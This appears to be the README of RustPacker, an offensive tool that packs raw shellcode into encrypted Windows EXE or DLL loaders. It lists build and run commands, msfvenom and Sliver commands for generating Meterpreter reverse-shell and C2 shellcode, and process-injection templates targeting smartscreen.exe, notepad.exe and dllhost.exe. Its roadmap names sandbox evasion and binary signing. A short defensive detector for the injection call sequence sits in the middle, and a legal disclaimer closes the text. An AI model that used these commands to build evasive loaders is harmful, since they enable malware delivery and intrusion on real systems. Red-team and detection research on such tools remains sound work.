Yes! Tested with the common Metasploit calc exec payload on a Windows 11 host, using the ntCRT template and AES. Last test on 21/12/2023.
Consider using Podman instead of Docker for security reasons. From any internet-connected OS with either Podman or Docker installed:
- Build the container image (this operation may take a while):
```
git clone https://github.com/Nariod/RustPacker.git
cd RustPacker/
podman build -t rustpacker -f Dockerfile
```
- Paste your shellcode file in the `shared` folder, and create your first binary targeting a running `smartscreen.exe` process:
```
podman run --rm -v $(pwd)/shared:/usr/src/RustPacker/shared:z rustpacker RustPacker -f shared/calc.raw -i syscrt -e aes -b exe -t smartscreen.exe
```
- Retrieve the output binary along with the Rust source files in the `output_[RANDOM_NAME]` folder, under `target/x86_64-pc-windows-gnu/release/`.
For regular use, you can set an alias:
- On a Linux host:
```
alias rustpacker='podman run --rm -v $(pwd)/shared:/usr/src/RustPacker/shared:z rustpacker RustPacker'
```
- Then:
```
rustpacker -f shared/calc.raw -i syscrt -e aes -b exe -t smartscreen.exe
```
RustPacker is compatible with any raw shellcode.
You can generate raw MSF shellcode using msfvenom's raw format. Example:
```
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=80 EXITFUNC=thread -f raw -o msf.bin
```
You can generate raw Sliver shellcode using Sliver's `--format shellcode`. Example:
```
generate --mtls 127.0.0.1:443 --format shellcode --os windows --evasion
```
- You can use the Shikata Ga Nai (SGN) Sliver encoder if prompted. RustPacker templates now use RWX memory regions (not really OPSEC safe), which are required for SGN to work.
Consider using Podman instead of Docker for security reasons. From any internet-connected OS with either Podman or Docker installed:
```
git clone https://github.com/Nariod/RustPacker.git
cd RustPacker/
podman build -t rustpacker -f Dockerfile
```
- Paste your shellcode file in the `shared` folder and run:
```
podman run --rm -v $(pwd)/shared:/usr/src/RustPacker/shared:z rustpacker RustPacker -f shared/calc.raw -i ntcrt -e xor -b exe -t smartscreen.exe
```
- Retrieve the output binary along with the Rust source files in the `output_RANDOM_NAME` folder in `shared`.
For regular use, you can set an alias:
- On a Linux host:
```
alias rustpacker='podman run --rm -v $(pwd)/shared:/usr/src/RustPacker/shared:z rustpacker RustPacker'
```
- Then:
```
rustpacker -f shared/calc.raw -i ntcrt -e xor -b exe -t smartscreen.exe
```
Install dependencies:
```
sudo apt update && sudo apt upgrade -y
sudo apt install -y libssl-dev librust-openssl-dev musl-tools mingw-w64 cmake libxml2-dev
```
Install Rust:
- https://www.rust-lang.org/tools/install
```
source $HOME/.cargo/env
rustup target add x86_64-pc-windows-gnu
```
Run RustPacker:
```
git clone https://github.com/Nariod/RustPacker.git
cd RustPacker/
cargo run -- -f shared/calc.raw -i ntcrt -e xor -b exe -t smartscreen.exe
```
For now, you can choose from the following templates:
- `winCRT`, which injects your shellcode in a remote process using the following high-level API calls: `OpenProcess`, `VirtualAllocEx`, `WriteProcessMemory`, `VirtualProtectEx`, `CreateRemoteThread`. You can supply the target process with `-t`; defaults to `dllhost.exe` otherwise. Uses the official Windows crates.
- `ntCRT`, which injects your shellcode in a remote process using the following low-level API calls: `NtOpenProcess`, `NtAllocateVirtualMemory`, `NtWriteVirtualMemory`, `NtProtectVirtualMemory`, `NtCreateThreadEx`. You can supply the target process with `-t`; defaults to `dllhost.exe` otherwise.
- `ntAPC`, which executes your shellcode in a new process using the following low-level API calls: `NtAllocateVirtualMemory`, `NtWriteVirtualMemory`, `NtProtectVirtualMemory`, `NtQueueApcThread`, `NtTestAlert`.
- `sysCRT`, which injects your shellcode in a remote process using indirect syscalls to the following low-level APIs: `NtOpenProcess`, `NtAllocateVirtualMemory`, `NtWriteVirtualMemory`, `NtProtectVirtualMemory`, `NtCreateThreadEx`. You can supply the target process with `-t`; defaults to `dllhost.exe` otherwise. Uses the rust-syscalls project for syscalls.
- `winFIBER`, which executes your shellcode in a new process using the following high-level API calls: `VirtualAlloc`, `WriteProcessMemory`, `VirtualProtect`, `CreateFiber`, `ConvertThreadToFiber`, `SwitchToFiber`. Uses the official Windows crates. Thanks to Maldev Academy for the execution sequence with fibers!
- `ntFIBER`, which executes your shellcode in a new process using the following low-level API calls: `NtAllocateVirtualMemory`, `NtWriteVirtualMemory`, `NtProtectVirtualMemory`, `CreateFiberEx`, `ConvertThreadToFiber`, `SwitchToFiber`. Uses the official Windows crates. Thanks to Maldev Academy for the execution sequence with fibers!
- `sysFIBER`, which executes your shellcode in a new process using indirect syscalls to the following low-level API calls: `NtAllocateVirtualMemory`, `NtWriteVirtualMemory`, `NtProtectVirtualMemory`. Then calls `CreateFiberEx`, `ConvertThreadToFiber`, `SwitchToFiber`. Uses the official Windows crates. Thanks to Maldev Academy for the execution sequence with fibers!
All the templates are compatible with either XOR or AES encryption, and can generate an EXE or a DLL file. Templates that inject in remote processes are compatible with the `-t` option to target the process of your choice.
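The call sequences listed above are also what a defender can key on. As an added example (not code from RustPacker), here is a small Rust detector that walks a constructed per-process API-call trace and flags a process that completes the open/allocate/write/protect/create-thread sequence in order against another process, plus any request for RWX memory, which the templates now use; the trace line format, field names and PIDs are assumptions made for the example.

```rust
use std::collections::HashMap;

/// Win32 and Nt names collapse to one step, so winCRT, ntCRT and sysCRT traces match the same pattern.
fn step_of(api: &str) -> Option<usize> {
    Some(match api {
        "OpenProcess" | "NtOpenProcess" => 0,
        "VirtualAllocEx" | "NtAllocateVirtualMemory" => 1,
        "WriteProcessMemory" | "NtWriteVirtualMemory" => 2,
        "VirtualProtectEx" | "NtProtectVirtualMemory" => 3,
        "CreateRemoteThread" | "NtCreateThreadEx" => 4,
        _ => return None,
    })
}

/// Walks a per-process API trace (constructed line format: "<pid> <api> [key=value ...]")
/// and returns (PIDs that completed the open/alloc/write/protect/thread sequence in order,
/// PIDs that requested PAGE_EXECUTE_READWRITE memory).
pub fn detect(trace: &str) -> (Vec<u32>, Vec<u32>) {
    let mut progress: HashMap<u32, usize> = HashMap::new();
    let (mut injectors, mut rwx): (Vec<u32>, Vec<u32>) = (Vec::new(), Vec::new());
    for line in trace.lines() {
        let mut f = line.split_whitespace();
        let pid: u32 = match f.next().and_then(|p| p.parse::<u32>().ok()) { Some(p) => p, None => continue };
        let api = match f.next() { Some(a) => a, None => continue };
        let next = progress.entry(pid).or_insert(0);
        if step_of(api) == Some(*next) {
            *next += 1; // only the expected next step advances this process's state machine
            if *next == 5 && !injectors.contains(&pid) { injectors.push(pid); }
        }
        if f.any(|kv| kv == "protect=PAGE_EXECUTE_READWRITE") && !rwx.contains(&pid) {
            rwx.push(pid);
        }
    }
    (injectors, rwx)
}

/// Constructed sample: pid 4242 performs the full CRT sequence with RWX memory;
/// pid 900 only opens and reads a process (benign, e.g. a debugger).
pub const SAMPLE_TRACE: &str = "\
4242 NtOpenProcess target=smartscreen.exe
4242 NtAllocateVirtualMemory size=4096 protect=PAGE_EXECUTE_READWRITE
4242 NtWriteVirtualMemory size=4096
4242 NtProtectVirtualMemory protect=PAGE_EXECUTE_READWRITE
900 OpenProcess target=explorer.exe
900 ReadProcessMemory size=64
4242 NtCreateThreadEx target=smartscreen.exe
";
```

Running `detect(SAMPLE_TRACE)` yields `([4242], [4242])`: the in-order match keeps a process that merely opens and reads another one out of the result.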
If you want to pack your Sliver shellcode using the `ntCRT` template with AES encryption, target `notepad.exe`, and retrieve an EXE file:
- Generate your raw shellcode from Sliver
- Copy / paste your shellcode file in the `shared` folder of the RustPacker project
- Using Podman/Docker without alias:
```
podman run --rm -v $(pwd)/shared:/usr/src/RustPacker/shared:z rustpacker RustPacker -f shared/AMAZING_SLIVER.bin -i ntcrt -e aes -b exe -t notepad.exe
```
- Using Podman/Docker with an alias:
```
rustpacker -f shared/AMAZING_SLIVER.bin -i ntcrt -e aes -b exe -t notepad.exe
```
- Retrieve the output binary along with the Rust source files in the `output_[RANDOM_NAME]` folder, under `target/x86_64-pc-windows-gnu/release/`.
If you want to pack your Msfvenom shellcode using the `ntAPC` template with XOR encryption, and retrieve a DLL file:
- Generate your raw shellcode from Msfvenom
- Copy / paste your shellcode file in the `shared` folder of the RustPacker project
- Using Podman/Docker without alias:
```
podman run --rm -v $(pwd)/shared:/usr/src/RustPacker/shared:z rustpacker RustPacker -f shared/msf.bin -i ntapc -e xor -b dll
```
- Using Podman/Docker with an alias:
```
rustpacker -f shared/msf.bin -i ntapc -e xor -b dll
```
- Retrieve the output binary along with the Rust source files in the `output_[RANDOM_NAME]` folder, under `target/x86_64-pc-windows-gnu/release/`.
If you want to specify a custom output directory and filename for the resulting binary:
- Add the `-o` option followed by the desired output directory path.
- Example without alias:
```
podman run --rm -v $(pwd)/shared:/usr/src/RustPacker/shared:z rustpacker RustPacker -f shared/msf.bin -i ntapc -e xor -b dll -o shared/my_file.dll
```
- Example with alias:
```
rustpacker -f shared/msf.bin -i ntapc -e xor -b dll -o shared/my_file.dll
```
These templates are no longer available with RustPacker, but can be found in `RustPacker/templates/OLD/`:
- `ct`, which executes your shellcode by spawning a process using the following API calls: `VirtualAlloc`, `VirtualProtect`, `CreateThread`, `WaitForSingleObject`.
- `crt`, which injects your shellcode in the `dllhost.exe` process using the following API calls: `OpenProcess`, `VirtualAllocEx`, `WriteProcessMemory`, `VirtualProtectEx`, `CreateRemoteThread`.
If you have some experience with Rust, you're more than welcome to help! You can help by:
- Reviewing the code for mistakes / improvements
- Opening issues
- Contacting me on Discord for a more in depth review (nariod#4621)
- Port createThread Rust template
- Port createRemoteThread Rust template
- Debug binary file to Vec
- Debug compiler
- Packer POC
- Migrate to "std::include_bytes"
- Add xor
- Add AES
- Add Sliver SGN support
- Refactor code
- Write ntCRT template with Nt APIs
- Rewrite all templates using Nt APIs only
- Build dockerfile
- Strip output binaries
- Add string encryption option with litcrypt or other
- Add option to choose the target process to inject into
- Add sandbox evasion option
- Reduce cargo verbosity
- Generate random name for generated binary
- Add binary signing support
- Port ntCRT to sysCRT with syscalls
- Port ntAPC to sysAPC with syscalls
- Write detailed doc
- Support both EXE and DLL formats
- Add semaphore/mutex support to ensure only one instance of the shellcode is running
- Remove the annoying snake case warnings
- Bump Clap from v3 to v4
- Implement Maldev Academy smart XOR
- memN0ps for all his work
- The rust-syscalls project
- trickster0 for his OffensiveRust repo
- Rust discord
- StackOverflow
- https://github.com/postrequest/link
- Maldev Academy for the Fibers shellcode execution method
- craiyon for the Rustpacker logo
Usage of anything presented in this repo to attack targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.